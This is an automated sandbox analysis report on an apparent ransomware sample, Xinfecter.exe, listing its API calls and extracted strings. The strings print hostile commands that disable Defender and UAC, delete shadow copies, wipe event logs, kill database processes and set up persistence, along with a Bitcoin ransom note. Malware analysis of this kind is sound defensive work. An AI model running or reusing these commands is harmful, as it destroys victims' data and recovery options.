Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 114923->114924 114925 ade6f1 114924->114925 114926 ab4760 28 API calls 114925->114926 114929 ade725 ListArray 114925->114929 114927 ade70b 114926->114927 114928 aa6670 30 API calls 114927->114928 114928->114929 114929->114916 114931 ad493e 114930->114931 114932 ad4942 114930->114932 114934 ab4760 28 API calls 114931->114934 114984 ad7f30 24 API calls 4 library calls 114932->114984 114935 ad4961 114934->114935 114953 ad4230 CryptAcquireContextA 114935->114953 114937 ad4970 114970 ad47f0 114937->114970 114939 ad497c CryptGenRandom 114940 ad498a 114939->114940 114941 ad49e4 114939->114941 114942 ad499c CryptReleaseContext 114940->114942 114943 ad49a5 114940->114943 114944 aa1bd0 _MREFOpen@16 28 API calls 114941->114944 114942->114943 114950 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 114943->114950 114945 ad49f1 114944->114945 114985 ad4390 30 API calls 3 library calls 114945->114985 114947 ad4a01 114986 b17e0c RaiseException 114947->114986 114949 ad4a0f 114951 a719ab 114950->114951 114952 b00c27 29 API calls __onexit 114951->114952 114952->114920 114954 ad427b GetLastError CryptAcquireContextA 114953->114954 114955 ad42a6 114953->114955 114954->114955 114956 ad4295 CryptAcquireContextA 114954->114956 114957 b005bb __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ 5 API calls 114955->114957 114956->114955 114958 ad42c4 SetLastError 114956->114958 114959 ad42c0 114957->114959 114960 aa1bd0 _MREFOpen@16 28 API calls 114958->114960 114959->114937 114961 ad42d8 114960->114961 114987 ad4390 30 API calls 3 library calls 114961->114987 114963 ad42eb 114988 b17e0c RaiseException 114963->114988 114965 ad42f9 114989 b17afd 27 API calls ___std_exception_copy 
114965->114989 114967 ad4347 114968 aa1c10 _MREFOpen@16 28 API calls 114967->114968 114969 ad4369 114968->114969 114969->114937 114971 ad4835 114970->114971 114972 ad48b7 114970->114972 114974 b0089a Concurrency::details::_CancellationTokenState::TokenRegistrationContainer::push_back 22 API calls 114971->114974 114983 ad4880 messages 114971->114983 114990 b0079a 5 API calls __Init_thread_wait 114972->114990 114976 ad4845 114974->114976 114975 ad48c1 114975->114971 114991 b00c27 29 API calls __onexit 114975->114991 114978 ad4230 35 API calls 114976->114978 114981 ad485d 114976->114981 114978->114981 114979 ad48e5 114992 b00750 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 114979->114992 114982 ad4877 CryptReleaseContext 114981->114982 114981->114983 114982->114983 114983->114939 114984->114931 114985->114947 114986->114949 114987->114963 114988->114965 114989->114967 114990->114975 114991->114979 114992->114971 114993->114124 114995 a9c18c GetConsoleWindow ShowWindow 114994->114995 114995->114128 114995->114142 114996->114136 114997->114294 114998->114341 114999->114341 115000->114353 115001->114403 115002->114409
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ ",$ /f$ ::$ <span class="spnn">$ ="$" start= auto$" start=auto$", $","$"cmd.exe","$"disaust",$"ren_end",$.K0H$.txt$21L0I$:: $:\Documents and Settings\$:\Users\$:\Windows\SysMain.sys$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$=" $All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Dflt$Lpath$Second Email :$Telegram , ID :$Version 5.$X$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\AppData\SysMain.sys$\Start Menu\Programs\Startup\Xinfecter.exe$_Mail-$_[ID-$alterencsz="$alterencsz="",$asykat$asykat$user$c$c$c:\R_cfg.ini$c:\skips.txt$c_drive="$c_drive=""$c_end$dcdcf$dismx$emptyString$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$fpath="$fpath=""$h2gq$invalid stod argument$k2ba8v$mode="$mode="",$mode="fast",$mode="slow",$n7t0$nodisk$noshare$p2h6$r1d8la$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$sc create SqlBakup binPath= "$skip_path="$skip_path=""$spath$spath="$spath=""$stod argument out of range$taskkill /PID $taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$tasklist /v /fo csv | findstr /i "dcdcf"$thd_per_drv="$thd_per_drv=""$total_thd="$total_thd=""$u4g8$ver
                                                                                                        • API String ID: 0-3208491923
                                                                                                        • Opcode ID: 5fac6d85f9e8aff90b62f35158dcc2e0faf4739fb670bc6c5bf4a1b582ae5312
                                                                                                        • Instruction ID: 8a6ae71e3c746e0a3cc90dca8e1c2e57147cbfc5199dc037235430a1b91325d4
                                                                                                        • Opcode Fuzzy Hash: 5fac6d85f9e8aff90b62f35158dcc2e0faf4739fb670bc6c5bf4a1b582ae5312
                                                                                                        • Instruction Fuzzy Hash: 54D3F131E10248DBDF14EF68CD86BDDBBB1AF55314F108199E409A72D2EB749B88CB91

                                                                                                        APIs
                                                                                                        • GetConsoleWindow.KERNEL32 ref: 00A9C1B9
                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 00A9C1C2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$ConsoleShow
                                                                                                        • String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ <span class="spnn">$" start= auto$" start=auto$.K0H$21L0I$:\Documents and Settings\$:\Users\$:\Windows\SysMain.sys$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Fast$Lpath$Manual_Mini_Config$Mini_Config$Mini_Config$Normal_Config$Second Email :$Version 5.$\AppData\N-Save.sys$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\Start Menu\Programs\Startup\Xinfecter.exe$user$c$dcdcf$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$h2gq$n7t0$p2h6$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$sc create SqlBakup binPath= "$spath$taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$tasklist /v /fo csv | findstr /i "dcdcf"$u4g8$ver$Z0
                                                                                                        • API String ID: 3999960783-4156082234
                                                                                                        • Opcode ID: fd5343d9a4549fd505171ddcade8271c228d43e1d970510fbb40702e6788532b
                                                                                                        • Instruction ID: 3c812ca272666566f112cdd9365dd9b185877db88488b5ad92ea8fde477a2fc7
                                                                                                        • Opcode Fuzzy Hash: fd5343d9a4549fd505171ddcade8271c228d43e1d970510fbb40702e6788532b
                                                                                                        • Instruction Fuzzy Hash: CCD2D331E14258AADB24F774CE56BEDB7B49F22340F4481E9A449672D2EF701F48CB92

                                                                                                        Control-flow Graph
                                                                                                        • Interactive graph not reproduced here: function starting at 00A792A0, basic blocks spanning 00A792A0-00A7AC70 (nodes are coloured executed / not executed in the original report)
                                                                                                        APIs
                                                                                                        • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A79A38
                                                                                                          • Part of subcall function 00B21D0C: DeleteFileW.KERNEL32(?,?,00A798D8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B21D14
                                                                                                          • Part of subcall function 00B21D0C: GetLastError.KERNEL32(?,00A798D8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000020), ref: 00B21D1E
                                                                                                          • Part of subcall function 00B21D0C: __dosmaperr.LIBCMT ref: 00B21D25
                                                                                                        Strings
                                                                                                        • :\Users\ReadMe.hta", xrefs: 00A79ACB
                                                                                                        • rem, xrefs: 00A792F4
                                                                                                        • @echo offIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs"), xrefs: 00A7AADA
                                                                                                        • \AppData\S-2153.bat, xrefs: 00A7AAA7
                                                                                                        • a5m6f, xrefs: 00A79822, 00A79845
                                                                                                        • \AppData\S-6748.bat, xrefs: 00A7955D
                                                                                                        • ):secttwotasklist /fi "ImageName eq , xrefs: 00A79F49
                                                                                                        • \AppData\S-8459.vbs, xrefs: 00A7A9F1
                                                                                                        • "%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\, xrefs: 00A79A4F
                                                                                                        • ">NULif "%ERRORLEVEL%"=="0" goto imerif %lend% == bed (goto akakak)set lend=bedIF EXIST , xrefs: 00A79D39
                                                                                                        • :\Users\, xrefs: 00A794EB, 00A7A9C7, 00A7AA7D
                                                                                                        • Xinfecter.exe" (IF EXIST ", xrefs: 00A7A425
                                                                                                        • " /fo csv 2>NUL | find /I ", xrefs: 00A79C8D, 00A79FF9
                                                                                                        • kaj3n, xrefs: 00A79865, 00A79BA1
                                                                                                        • " Xinfecter.exe , xrefs: 00A79E99, 00A7A2C9
                                                                                                        • "%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\, xrefs: 00A79AA4
                                                                                                        • l, xrefs: 00A7AB19
                                                                                                        • Xinfecter.exe" (start /d , xrefs: 00A79DF3, 00A7A215
                                                                                                        • schtasks /delete /tn Microsoft_Auto_Scheduler /fIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (DEL "%SystemDr, xrefs: 00A7A7D1
                                                                                                        • (goto secthree):akakak, xrefs: 00A7A7A3
                                                                                                        • ))goto notend):imertimeout /t 90 /nobreak >NULIF EXIST , xrefs: 00A7A771
                                                                                                        • @echo offtasklist /v | find /I /c "dcdcf" > nulif "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunningset lend=debvssadmin.exe D, xrefs: 00A79C77
                                                                                                        • (goto secttwo:sectonIF EXIST , xrefs: 00A7A165
                                                                                                        • ">NULif "%ERRORLEVEL%"=="0" goto notendgoto secton:notendtimeout /t 15 /nobreak >NULIF NOT EXIST , xrefs: 00A7A0A9
                                                                                                        • )IF NOT EXIST , xrefs: 00A7A375
                                                                                                        • cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat, xrefs: 00A7AB33
                                                                                                        • schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f, xrefs: 00A7AB52
                                                                                                        • Dim strScriptDim oExec, oWshShellDim ComSpecSet oWshShell = CreateObject("WScript.Shell")ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"Set oExec = oWshShel, xrefs: 00A7AA24
                                                                                                        • Xinfecter.exe, xrefs: 00A79686, 00A79B66
                                                                                                        • slow, xrefs: 00A79344
                                                                                                        • rem a5m6f, xrefs: 00A79B8B
                                                                                                        • (start /d , xrefs: 00A7A529
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: DeleteErrorFileIos_base_dtorLast__dosmaperrstd::ios_base::_
                                                                                                        • String ID: ))goto notend):imertimeout /t 90 /nobreak >NULIF EXIST $):secttwotasklist /fi "ImageName eq $)IF NOT EXIST $schtasks /delete /tn Microsoft_Auto_Scheduler /fIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (DEL "%SystemDr$ (goto secthree):akakak$ (goto secttwo:sectonIF EXIST $ (start /d $" /fo csv 2>NUL | find /I "$" Xinfecter.exe $"%SystemDrive%\Documents and Settings\%username%\Start Menu\Programs\Startup\$"%SystemDrive%\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$">NULif "%ERRORLEVEL%"=="0" goto imerif %lend% == bed (goto akakak)set lend=bedIF EXIST $">NULif "%ERRORLEVEL%"=="0" goto notendgoto secton:notendtimeout /t 15 /nobreak >NULIF NOT EXIST $:\Users\$:\Users\ReadMe.hta"$@echo offIF EXIST "%SystemDrive%\Users\%username%\AppData\S-8459.vbs" (start "" "%SystemDrive%\Users\%username%\AppData\S-8459.vbs")$@echo offtasklist /v | find /I /c "dcdcf" > nulif "%ERRORLEVEL%" == "0" goto ErrorAlreadyRunningset lend=debvssadmin.exe D$Dim strScriptDim oExec, oWshShellDim ComSpecSet oWshShell = CreateObject("WScript.Shell")ComSpec = oWshShell.ExpandEnvironmentStrings("%comspec%")strScript = ComSpec & " /C echo %SystemDrive%\Users\%username%\AppData\S-6748.bat"Set oExec = oWshShel$Xinfecter.exe$Xinfecter.exe" (IF EXIST "$Xinfecter.exe" (start /d $\AppData\S-2153.bat$\AppData\S-6748.bat$\AppData\S-8459.vbs$a5m6f$cd "%SystemDrive%\Users\%username%\AppData\"&S-2153.bat$kaj3n$l$rem$rem a5m6f$schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\S-2153.bat'" /f$slow
                                                                                                        • API String ID: 969238624-3584783570
                                                                                                        • Opcode ID: 7235b49b432bf51a04295e0479eba0f1ce2cc0bc069a360e57a48f29d34edf13
                                                                                                        • Instruction ID: 3de264444d94e6c8e8ca3a9fca8c61a802edb1bab27909f895b56504c93b9853
                                                                                                        • Opcode Fuzzy Hash: 7235b49b432bf51a04295e0479eba0f1ce2cc0bc069a360e57a48f29d34edf13
                                                                                                        • Instruction Fuzzy Hash: 60F26970D14258CEDB24DF64CE55BEEB7B0AF55304F0082D9E109672A2EBB5AB88CF51

                                                                                                        Control-flow Graph
                                                                                                        • Interactive graph not reproduced here: function starting at 00A9D08F, basic blocks spanning 00A9D08F-00A9E5A2 (nodes are coloured executed / not executed in the original report)
                                                                                                        APIs
                                                                                                          • Part of subcall function 00A7B040: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A7B0E7
                                                                                                          • Part of subcall function 00A7AE10: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00A7AE81
                                                                                                        • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 00A9D89E
                                                                                                          • Part of subcall function 00B259C6: MoveFileExW.KERNEL32(?,?,00000002), ref: 00B259D3
                                                                                                          • Part of subcall function 00B259C6: GetLastError.KERNEL32 ref: 00B259DD
                                                                                                          • Part of subcall function 00B259C6: __dosmaperr.LIBCMT ref: 00B259E4
                                                                                                        Strings
                                                                                                        • To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp, xrefs: 00A9DB1C
                                                                                                        • </span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our , xrefs: 00A9D91F
                                                                                                        • <span class="spnn">, xrefs: 00A9D953
                                                                                                        • Dflt, xrefs: 00A9DB9D
                                                                                                        • c, xrefs: 00A9DD09
                                                                                                        • _Mail-, xrefs: 00A9DBF7
                                                                                                        • </title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou, xrefs: 00A9D8BB
                                                                                                        • u4g8, xrefs: 00A9D541
                                                                                                        • c, xrefs: 00A9DB8F
                                                                                                        • _[ID-, xrefs: 00A9DBC6
                                                                                                        • <html><head><title>, xrefs: 00A9D8A8
                                                                                                        • If You Do Not Receive A Response Within 24 Hours, Send A Message To Our , xrefs: 00A9DAB2
                                                                                                        • If You Want To Restore Them Email Us : , xrefs: 00A9DA80
                                                                                                        • All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without , xrefs: 00A9DA6D
                                                                                                        • h2gq, xrefs: 00A9D57E
                                                                                                        • brok, xrefs: 00A9D609
                                                                                                        • .K0H, xrefs: 00A9D4E5, 00A9D4F2, 00A9DC42
                                                                                                        • </span></br></br>If You Want To Restore Them Email Us : <span class="spnn">, xrefs: 00A9D8ED
                                                                                                        • :\Users\, xrefs: 00A9D5ED
                                                                                                        • \AppData\N-Save.sys, xrefs: 00A9D622
                                                                                                        • 21L0I, xrefs: 00A9D8D4, 00A9DA68, 00A9DBDE
                                                                                                        • taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk, xrefs: 00A9DA49
                                                                                                        • for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1", xrefs: 00A9E4A4
                                                                                                        • file, xrefs: 00A9DB98
                                                                                                        • Z0, xrefs: 00A9D1D1
                                                                                                        • Second Email :, xrefs: 00A9D869
                                                                                                        • </span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The , xrefs: 00A9D985
                                                                                                        • reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic, xrefs: 00A9DA1B
                                                                                                        • U, xrefs: 00A9D6E8
                                                                                                        • p2h6, xrefs: 00A9D3B9, 00A9D481
                                                                                                        • n7t0, xrefs: 00A9D3A6, 00A9D46E
                                                                                                        • Telegram , ID :, xrefs: 00A9D893
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
                                                                                                        • Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                        Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: Ios_base_dtorstd::ios_base::_$ErrorFileLastMoveSimpleString::operator=__dosmaperr
• String ID: If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $If You Want To Restore Them Email Us : $To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .Every Day The Delay Increases The Price !! The Decryp$ <span class="spnn">$.K0H$21L0I$:\Users\$</span></br></br>If You Do Not Receive A Response Within 24 Hours, Send A Message To Our $</span></br></br>If You Want To Restore Them Email Us : <span class="spnn">$</span></br></br>To Decrypt Your Files You Need Buy Our Special Decrypter In Bitcoin .</br></br>Every Day The Delay Increases The $</title><style>.spnn { background-color:yellow;} .xsw{color:white;} .Circe1 {display: list-item;padding-left:30px;}.dives{backgrou$<html><head><title>$All Your Files Are Locked And Important Data Downloaded !Your Files Are No Longer Accessible Don't Waste Your Time, Without $Dflt$Second Email :$Telegram , ID :$U$\AppData\N-Save.sys$_Mail-$_[ID-$user$c$c$file$for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"$h2gq$n7t0$p2h6$reg.exe add "HKLMSoftwarePoliciesMicrosoftWindows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f&reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic$taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskk$u4g8$Z0
• API String ID: 4082941153-1221866610
• Opcode ID: f2dc5eaf3a2c3565e2c214f5c136932c20d14d858e3477c257ec48f85b7b855c
• Instruction ID: 5685c978047452649971ef2359b1251e0ba83d4ea295f0a9340bffba5d370ea6
• Opcode Fuzzy Hash: f2dc5eaf3a2c3565e2c214f5c136932c20d14d858e3477c257ec48f85b7b855c
• Instruction Fuzzy Hash: DC72BF75D141589ADB14E760DE52BEEB7B8AF25344F5480E8A00E631D2EF706F88CF62

Control-flow Graph
APIs
• std::locale::_Init.LIBCPMT ref: 00A78D2C
  • Part of subcall function 00AE89F6: __EH_prolog3.LIBCMT ref: 00AE89FD
  • Part of subcall function 00AE89F6: std::_Lockit::_Lockit.LIBCPMT ref: 00AE8A08
  • Part of subcall function 00AE89F6: std::locale::_Setgloballocale.LIBCPMT ref: 00AE8A23
  • Part of subcall function 00AE89F6: std::_Lockit::~_Lockit.LIBCPMT ref: 00AE8A79
• WSAStartup.WS2_32(00000202,?), ref: 00A78FDA
• socket.WS2_32(00000002,00000001,00000006), ref: 00A78FFA
• gethostbyname.WS2_32(?), ref: 00A79012
• htons.WS2_32(00000E02), ref: 00A7901F
• connect.WS2_32(?,?,00000010), ref: 00A79054
• send.WS2_32(?,?,?,00000000), ref: 00A790B9
• recv.WS2_32(?,?,00002710,00000000), ref: 00A790E4
• recv.WS2_32(?,?,00002710,00000000), ref: 00A79163
• closesocket.WS2_32(?), ref: 00A7916E
• WSACleanup.WS2_32 ref: 00A79174
Strings
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: Lockitrecvstd::_std::locale::_$CleanupH_prolog3InitLockit::_Lockit::~_SetgloballocaleStartupclosesocketconnectgethostbynamehtonssendsocket
• String ID: Connection: close$ HTTP/1.1Host: $GET /$off
• API String ID: 928259667-845956351
• Opcode ID: a72da5c10655daf606c97b5202c4f4957cda926daae957d09cca4395521c5f74
• Instruction ID: a60b8e73311aa95ddbd49ecb2ceb498007d0de2be1ae4a891541e06a99acb237
• Opcode Fuzzy Hash: a72da5c10655daf606c97b5202c4f4957cda926daae957d09cca4395521c5f74
• Instruction Fuzzy Hash: E3F18E30A052599FEB29DF24CD48B9DBBB5EB45304F00C2D9E40DAB292DB759B848F51
APIs
• GetWindowTextLengthA.USER32(?), ref: 00A85327
• GetWindowTextA.USER32(?,00000000,00000001), ref: 00A853F9
Strings
Memory Dump Source
• Source File: 00000000.00000002.2503955497.0000000000A71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A70000, based on PE: true
• Associated: 00000000.00000002.2503874508.0000000000A70000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504259385.0000000000B53000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504340668.0000000000B8F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504384403.0000000000B91000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504442835.0000000000B96000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2504500669.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_a70000_BiXS3FRoLe.jbxd
Similarity
• API ID: TextWindow$Length
• String ID: !$P$asykat$asykat$k2ba8v$r1d8la
• API String ID: 1006428111-138844214
• Opcode ID: 70cdfc7e7ffb2b9d78e4637b1bfabaca8c5ec5e0a740b7f62d264baba01a0c77
• Instruction ID: 1e96540982a6d1e099c30f21ba6daa024fd1dabbd2220958069ba916239078f3
• Opcode Fuzzy Hash: 70cdfc7e7ffb2b9d78e4637b1bfabaca8c5ec5e0a740b7f62d264baba01a0c77
• Instruction Fuzzy Hash: B3A2D371E102598FEB28EF68CD84BEDBBB1FF45304F148299E409A7291DB759A84CF50

Control-flow Graph

APIs
• CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,AE695AF0,00B99528,?,00000000), ref: 00AD4275
